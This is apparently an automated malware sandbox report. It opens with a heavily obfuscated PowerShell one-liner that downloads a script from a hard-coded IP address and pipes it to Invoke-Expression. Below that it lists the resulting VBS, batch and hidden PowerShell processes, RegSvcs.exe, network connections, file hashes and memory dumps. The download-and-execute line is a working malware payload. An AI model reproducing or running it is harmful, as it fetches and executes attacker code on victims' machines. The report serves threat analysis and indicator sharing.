¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ybaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yCaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ylaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yiaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y).DaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yoaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ywaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ylaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yoaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yaaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ydaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ySaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yraUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yiaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yg(''http://185.81.157.103/96/1.txt'')').Replace('aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y','')|iex
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\hich.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| FR | 185.81.157.103:80 | 185.81.157.103 | tcp |
| US | 8.8.8.8:53 | 103.157.81.185.in-addr.arpa | udp |
| FR | 185.81.157.103:80 | 185.81.157.103 | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.166.122.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.178.17.96.in-addr.arpa | udp |
| FR | 185.81.157.183:9696 | tcp | |
| FR | 185.81.157.183:9696 | tcp | |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sfaqiojb.kai.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3004-8-0x000002C0AAF90000-0x000002C0AAFB2000-memory.dmp
memory/3004-13-0x00007FF844390000-0x00007FF844E51000-memory.dmp
memory/3004-14-0x000002C0C3430000-0x000002C0C3440000-memory.dmp
memory/3004-15-0x000002C0C3430000-0x000002C0C3440000-memory.dmp
memory/3004-19-0x000002C0C3430000-0x000002C0C3440000-memory.dmp
memory/3004-22-0x00007FF844390000-0x00007FF844E51000-memory.dmp
C:\Users\Public\hich.vbs
| MD5 | 741b5b0a474f0e0cd28fd880f68723c0 |
| SHA1 | 4de5489c4e56882514b3ab432048200eae65f90d |
| SHA256 | f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23 |
| SHA512 | 3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54 |
C:\Users\Public\hich.bat
| MD5 | 6c8a34a94e068b809145df09acbe153c |
| SHA1 | 0ec5c6964c6ccc949af47297eb9794f8f1ee4724 |
| SHA256 | c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003 |
| SHA512 | 41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
memory/4216-26-0x00007FF844390000-0x00007FF844E51000-memory.dmp
memory/4216-28-0x000001AAA3660000-0x000001AAA3670000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b66db53846de4860ca72a3e59b38c544 |
| SHA1 | 2202dc88e9cddea92df4f4e8d83930efd98c9c5a |
| SHA256 | b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030 |
| SHA512 | 72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527 |
memory/4216-27-0x000001AAA3660000-0x000001AAA3670000-memory.dmp
C:\Users\Public\hich.ps1
| MD5 | 8469f5b76df0f510fe02b1eab0f57226 |
| SHA1 | 7ad6c79dc42aafd7b813353c8bdcb1204c376621 |
| SHA256 | a7247306f746e668360268472d038a8848d49645970ca7501d50cc0f700db279 |
| SHA512 | 526280cb8cc15bae99a02c6f6a0ca26564f7eb657f610cd1579d953b584705b9bca8d0a7b6902e0bd0234912acdbb1b74bf4adf8aa7c6e49b6876b8ae82fe0b4 |
memory/4216-40-0x000001AAA3C40000-0x000001AAA3C74000-memory.dmp
memory/4216-41-0x000001AAA3660000-0x000001AAA3670000-memory.dmp
memory/1144-42-0x0000000000400000-0x0000000000416000-memory.dmp
memory/4216-44-0x00007FF844390000-0x00007FF844E51000-memory.dmp
memory/1144-45-0x0000000075250000-0x0000000075A00000-memory.dmp
memory/1144-46-0x00000000057E0000-0x00000000057F0000-memory.dmp
memory/1144-47-0x0000000005ED0000-0x0000000006474000-memory.dmp
memory/1144-48-0x0000000005B00000-0x0000000005B92000-memory.dmp
memory/1144-49-0x0000000005AF0000-0x0000000005AFA000-memory.dmp